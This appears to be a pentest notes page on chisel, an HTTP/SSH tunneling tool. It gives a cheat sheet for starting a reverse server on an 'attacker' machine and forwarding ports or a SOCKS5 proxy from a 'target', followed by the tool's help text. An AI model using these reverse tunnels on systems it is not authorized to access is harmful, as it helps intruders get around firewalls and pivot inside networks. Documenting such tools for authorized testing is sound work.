GitHub Blog

chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

Source code and download on the github repo.

Cheat Sheet

From attacker/server start listening on 9090:

./chisel server -p 9090 --reverse

From client/target:

# listen on 80, forward to localhost:80
./chisel client {server ip}:9090 R:80:127.0.0.1:80
# listen on 3000, forward to 172.17.0.1:3000
./chisel client {server ip}:9090 R:3000:172.17.0.1:3000
# listen on 4242, forward to 172.17.0.1:3000
./chisel client {server ip}:9090 R:4242:172.17.0.1:3000
# create SOCKS5 listener on default port (1080), proxy through client
./chisel client {server ip}:9090 R:socks

0xdf's guide is pretty good for a deep understanding of chisel: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

Usage

--help flag:

# ./chisel --help
Usage: chisel [command] [--help]

  Version: 1.7.7 (go1.17.6)

  Commands:
    server - runs chisel in server mode
    client - runs chisel in client mode

  Read more:
    https://github.com/jpillora/chisel

Server

--help flag:

# ./chisel server --help
  Usage: chisel server [options]

  Options:
    [...]

Client

--help flag:

# ./chisel client --help
  Usage: chisel client [options] <server> <remote> [remote] [remote] ...

  <server> is the URL to the chisel server.

  <remote>s are remote connections tunneled through the server, each of
  which come in the form:

    <local-host>:<local-port>:<remote-host>:<remote-port>/<protocol>

     local-host defaults to 0.0.0.0 (all interfaces).
     local-port defaults to remote-port.
     remote-port is required*.
     remote-host defaults to 0.0.0.0 (server localhost).
     protocol defaults to tcp.

  which shares <remote-host>:<remote-port> from the server to the client
  as <local-host>:<local-port>, or:

    R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>

  which does reverse port forwarding, sharing <remote-host>:<remote-port>
  from the client to the server's <local-interface>:<local-port>.

    example remotes

      3000
      example.com:3000
      3000:google.com:80
      192.168.0.5:3000:google.com:80
      socks
      5000:socks
      R:2222:localhost:22
      R:socks
      R:5000:socks
      stdio:example.com:22
      1.1.1.1:53/udp

    When the chisel server has --socks5 enabled, remotes can
    specify "socks" in place of remote-host and remote-port.
    The default local host and port for a "socks" remote is
    127.0.0.1:1080. Connections to this remote will terminate
    at the server's internal SOCKS5 proxy.

    When the chisel server has --reverse enabled, remotes can
    be prefixed with R to denote that they are reversed. That
    is, the server will listen and accept connections, and they
    will be proxied through the client which specified the remote.
    Reverse remotes specifying "R:socks" will listen on the server's
    default socks port (1080) and terminate the connection at the
    client's internal SOCKS5 proxy.

    When stdio is used as local-host, the tunnel will connect standard
    input/output of this program with the remote. This is useful when 
    combined with ssh ProxyCommand. You can use
      ssh -o ProxyCommand='chisel client chiselserver stdio:%h:%p' \
          [email protected]
    to connect to an SSH server through the tunnel.
    
    Options:
      [...]
PreviousnmapNextpriv esc

Last updated